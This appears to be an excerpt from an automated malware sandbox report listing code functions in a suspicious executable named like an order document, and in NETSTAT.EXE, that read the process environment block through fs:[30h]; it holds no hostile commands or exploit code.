Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h]		5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h]		5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h]		5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h]		5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h]		5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h]		5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h]		5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBB477 mov eax, dword ptr fs:[00000030h]		5_2_00FBB477
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB746D mov eax, dword ptr fs:[00000030h]		5_2_00FB746D
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010605AC mov eax, dword ptr fs:[00000030h]		5_2_010605AC
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010605AC mov eax, dword ptr fs:[00000030h]		5_2_010605AC
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCA44B mov eax, dword ptr fs:[00000030h]		5_2_00FCA44B
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC3C3E mov eax, dword ptr fs:[00000030h]		5_2_00FC3C3E
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC3C3E mov eax, dword ptr fs:[00000030h]		5_2_00FC3C3E
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC3C3E mov eax, dword ptr fs:[00000030h]		5_2_00FC3C3E
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01016DC9 mov eax, dword ptr fs:[00000030h]		5_2_01016DC9
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01016DC9 mov eax, dword ptr fs:[00000030h]		5_2_01016DC9
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01016DC9 mov eax, dword ptr fs:[00000030h]		5_2_01016DC9
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01016DC9 mov ecx, dword ptr fs:[00000030h]		5_2_01016DC9
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01016DC9 mov eax, dword ptr fs:[00000030h]		5_2_01016DC9
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01016DC9 mov eax, dword ptr fs:[00000030h]		5_2_01016DC9
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCBC2C mov eax, dword ptr fs:[00000030h]		5_2_00FCBC2C
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0105FDE2 mov eax, dword ptr fs:[00000030h]		5_2_0105FDE2
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0105FDE2 mov eax, dword ptr fs:[00000030h]		5_2_0105FDE2
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0105FDE2 mov eax, dword ptr fs:[00000030h]		5_2_0105FDE2
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0105FDE2 mov eax, dword ptr fs:[00000030h]		5_2_0105FDE2
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01048DF1 mov eax, dword ptr fs:[00000030h]		5_2_01048DF1
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h]		5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h]		5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h]		5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h]		5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h]		5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h]		5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h]		5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h]		5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h]		5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h]		5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h]		5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h]		5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h]		5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051C06 mov eax, dword ptr fs:[00000030h]		5_2_01051C06
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0106740D mov eax, dword ptr fs:[00000030h]		5_2_0106740D
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0106740D mov eax, dword ptr fs:[00000030h]		5_2_0106740D
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0106740D mov eax, dword ptr fs:[00000030h]		5_2_0106740D
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01016C0A mov eax, dword ptr fs:[00000030h]		5_2_01016C0A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01016C0A mov eax, dword ptr fs:[00000030h]		5_2_01016C0A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01016C0A mov eax, dword ptr fs:[00000030h]		5_2_01016C0A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01016C0A mov eax, dword ptr fs:[00000030h]		5_2_01016C0A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FAD5E0 mov eax, dword ptr fs:[00000030h]		5_2_00FAD5E0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FAD5E0 mov eax, dword ptr fs:[00000030h]		5_2_00FAD5E0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC1DB5 mov eax, dword ptr fs:[00000030h]		5_2_00FC1DB5
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC1DB5 mov eax, dword ptr fs:[00000030h]		5_2_00FC1DB5
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC1DB5 mov eax, dword ptr fs:[00000030h]		5_2_00FC1DB5
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0102C450 mov eax, dword ptr fs:[00000030h]		5_2_0102C450
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0102C450 mov eax, dword ptr fs:[00000030h]		5_2_0102C450
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC35A1 mov eax, dword ptr fs:[00000030h]		5_2_00FC35A1
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCFD9B mov eax, dword ptr fs:[00000030h]		5_2_00FCFD9B
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCFD9B mov eax, dword ptr fs:[00000030h]		5_2_00FCFD9B
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F92D8A mov eax, dword ptr fs:[00000030h]		5_2_00F92D8A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F92D8A mov eax, dword ptr fs:[00000030h]		5_2_00F92D8A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F92D8A mov eax, dword ptr fs:[00000030h]		5_2_00F92D8A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F92D8A mov eax, dword ptr fs:[00000030h]		5_2_00F92D8A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F92D8A mov eax, dword ptr fs:[00000030h]		5_2_00F92D8A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC2581 mov eax, dword ptr fs:[00000030h]		5_2_00FC2581
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC2581 mov eax, dword ptr fs:[00000030h]		5_2_00FC2581
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC2581 mov eax, dword ptr fs:[00000030h]		5_2_00FC2581
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC2581 mov eax, dword ptr fs:[00000030h]		5_2_00FC2581
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBC577 mov eax, dword ptr fs:[00000030h]		5_2_00FBC577
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBC577 mov eax, dword ptr fs:[00000030h]		5_2_00FBC577
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB8D76 mov eax, dword ptr fs:[00000030h]		5_2_00FB8D76
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB8D76 mov eax, dword ptr fs:[00000030h]		5_2_00FB8D76
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB8D76 mov eax, dword ptr fs:[00000030h]		5_2_00FB8D76
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB8D76 mov eax, dword ptr fs:[00000030h]		5_2_00FB8D76
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB8D76 mov eax, dword ptr fs:[00000030h]		5_2_00FB8D76
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h]		5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h]		5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h]		5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h]		5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h]		5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h]		5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h]		5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h]		5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h]		5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h]		5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h]		5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h]		5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01054496 mov eax, dword ptr fs:[00000030h]		5_2_01054496
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB7D50 mov eax, dword ptr fs:[00000030h]		5_2_00FB7D50
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD3D43 mov eax, dword ptr fs:[00000030h]		5_2_00FD3D43
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC4D3B mov eax, dword ptr fs:[00000030h]		5_2_00FC4D3B
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC4D3B mov eax, dword ptr fs:[00000030h]		5_2_00FC4D3B
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC4D3B mov eax, dword ptr fs:[00000030h]		5_2_00FC4D3B
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F9AD30 mov eax, dword ptr fs:[00000030h]		5_2_00F9AD30
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h]		5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h]		5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h]		5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h]		5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h]		5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h]		5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h]		5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h]		5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h]		5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h]		5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h]		5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h]		5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA3D34 mov eax, dword ptr fs:[00000030h]		5_2_00FA3D34
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01068CD6 mov eax, dword ptr fs:[00000030h]		5_2_01068CD6
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCF527 mov eax, dword ptr fs:[00000030h]		5_2_00FCF527
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCF527 mov eax, dword ptr fs:[00000030h]		5_2_00FCF527
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCF527 mov eax, dword ptr fs:[00000030h]		5_2_00FCF527
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01016CF0 mov eax, dword ptr fs:[00000030h]		5_2_01016CF0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01016CF0 mov eax, dword ptr fs:[00000030h]		5_2_01016CF0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01016CF0 mov eax, dword ptr fs:[00000030h]		5_2_01016CF0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010514FB mov eax, dword ptr fs:[00000030h]		5_2_010514FB
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0106070D mov eax, dword ptr fs:[00000030h]		5_2_0106070D
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0106070D mov eax, dword ptr fs:[00000030h]		5_2_0106070D
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0102FF10 mov eax, dword ptr fs:[00000030h]		5_2_0102FF10
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0102FF10 mov eax, dword ptr fs:[00000030h]		5_2_0102FF10
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA76E2 mov eax, dword ptr fs:[00000030h]		5_2_00FA76E2
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC16E0 mov ecx, dword ptr fs:[00000030h]		5_2_00FC16E0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC36CC mov eax, dword ptr fs:[00000030h]		5_2_00FC36CC
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD8EC7 mov eax, dword ptr fs:[00000030h]		5_2_00FD8EC7
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051751 mov eax, dword ptr fs:[00000030h]		5_2_01051751
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01068F6A mov eax, dword ptr fs:[00000030h]		5_2_01068F6A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBAE73 mov eax, dword ptr fs:[00000030h]		5_2_00FBAE73
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBAE73 mov eax, dword ptr fs:[00000030h]		5_2_00FBAE73
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBAE73 mov eax, dword ptr fs:[00000030h]		5_2_00FBAE73
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBAE73 mov eax, dword ptr fs:[00000030h]		5_2_00FBAE73
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBAE73 mov eax, dword ptr fs:[00000030h]		5_2_00FBAE73
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01017794 mov eax, dword ptr fs:[00000030h]		5_2_01017794
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01017794 mov eax, dword ptr fs:[00000030h]		5_2_01017794
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01017794 mov eax, dword ptr fs:[00000030h]		5_2_01017794
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA766D mov eax, dword ptr fs:[00000030h]		5_2_00FA766D
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA7E41 mov eax, dword ptr fs:[00000030h]		5_2_00FA7E41
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA7E41 mov eax, dword ptr fs:[00000030h]		5_2_00FA7E41
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA7E41 mov eax, dword ptr fs:[00000030h]		5_2_00FA7E41
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA7E41 mov eax, dword ptr fs:[00000030h]		5_2_00FA7E41
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA7E41 mov eax, dword ptr fs:[00000030h]		5_2_00FA7E41
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA7E41 mov eax, dword ptr fs:[00000030h]		5_2_00FA7E41
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F9E620 mov eax, dword ptr fs:[00000030h]		5_2_00F9E620
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCA61C mov eax, dword ptr fs:[00000030h]		5_2_00FCA61C
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCA61C mov eax, dword ptr fs:[00000030h]		5_2_00FCA61C
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F9C600 mov eax, dword ptr fs:[00000030h]		5_2_00F9C600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F9C600 mov eax, dword ptr fs:[00000030h]		5_2_00F9C600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F9C600 mov eax, dword ptr fs:[00000030h]		5_2_00F9C600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov ecx, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov ecx, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov ecx, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov ecx, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB5600 mov eax, dword ptr fs:[00000030h]		5_2_00FB5600
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC8E00 mov eax, dword ptr fs:[00000030h]		5_2_00FC8E00
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD37F5 mov eax, dword ptr fs:[00000030h]		5_2_00FD37F5
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01051608 mov eax, dword ptr fs:[00000030h]		5_2_01051608
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0104FE3F mov eax, dword ptr fs:[00000030h]		5_2_0104FE3F
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0105AE44 mov eax, dword ptr fs:[00000030h]		5_2_0105AE44
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0105AE44 mov eax, dword ptr fs:[00000030h]		5_2_0105AE44
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FA8794 mov eax, dword ptr fs:[00000030h]		5_2_00FA8794
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0102FE87 mov eax, dword ptr fs:[00000030h]		5_2_0102FE87
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FAFF60 mov eax, dword ptr fs:[00000030h]		5_2_00FAFF60
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01060EA5 mov eax, dword ptr fs:[00000030h]		5_2_01060EA5
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01060EA5 mov eax, dword ptr fs:[00000030h]		5_2_01060EA5
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01060EA5 mov eax, dword ptr fs:[00000030h]		5_2_01060EA5
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010146A7 mov eax, dword ptr fs:[00000030h]		5_2_010146A7
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FAEF40 mov eax, dword ptr fs:[00000030h]		5_2_00FAEF40
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0104FEC0 mov eax, dword ptr fs:[00000030h]		5_2_0104FEC0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBB73D mov eax, dword ptr fs:[00000030h]		5_2_00FBB73D
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBB73D mov eax, dword ptr fs:[00000030h]		5_2_00FBB73D
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCE730 mov eax, dword ptr fs:[00000030h]		5_2_00FCE730
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC3F33 mov eax, dword ptr fs:[00000030h]		5_2_00FC3F33
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_01068ED6 mov eax, dword ptr fs:[00000030h]		5_2_01068ED6
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F94F2E mov eax, dword ptr fs:[00000030h]		5_2_00F94F2E
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F94F2E mov eax, dword ptr fs:[00000030h]		5_2_00F94F2E
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC4710 mov eax, dword ptr fs:[00000030h]		5_2_00FC4710
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBF716 mov eax, dword ptr fs:[00000030h]		5_2_00FBF716
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCA70E mov eax, dword ptr fs:[00000030h]		5_2_00FCA70E
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCA70E mov eax, dword ptr fs:[00000030h]		5_2_00FCA70E
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038B138A mov eax, dword ptr fs:[00000030h]		14_2_038B138A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0382138B mov eax, dword ptr fs:[00000030h]		14_2_0382138B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0382138B mov eax, dword ptr fs:[00000030h]		14_2_0382138B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0382138B mov eax, dword ptr fs:[00000030h]		14_2_0382138B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038AD380 mov ecx, dword ptr fs:[00000030h]		14_2_038AD380
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03801B8F mov eax, dword ptr fs:[00000030h]		14_2_03801B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03801B8F mov eax, dword ptr fs:[00000030h]		14_2_03801B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0382B390 mov eax, dword ptr fs:[00000030h]		14_2_0382B390
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03822397 mov eax, dword ptr fs:[00000030h]		14_2_03822397
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_037FDB60 mov ecx, dword ptr fs:[00000030h]		14_2_037FDB60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_037FF358 mov eax, dword ptr fs:[00000030h]		14_2_037FF358
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038C5BA5 mov eax, dword ptr fs:[00000030h]		14_2_038C5BA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03824BAD mov eax, dword ptr fs:[00000030h]		14_2_03824BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03824BAD mov eax, dword ptr fs:[00000030h]		14_2_03824BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03824BAD mov eax, dword ptr fs:[00000030h]		14_2_03824BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_037FDB40 mov eax, dword ptr fs:[00000030h]		14_2_037FDB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038753CA mov eax, dword ptr fs:[00000030h]		14_2_038753CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038753CA mov eax, dword ptr fs:[00000030h]		14_2_038753CA
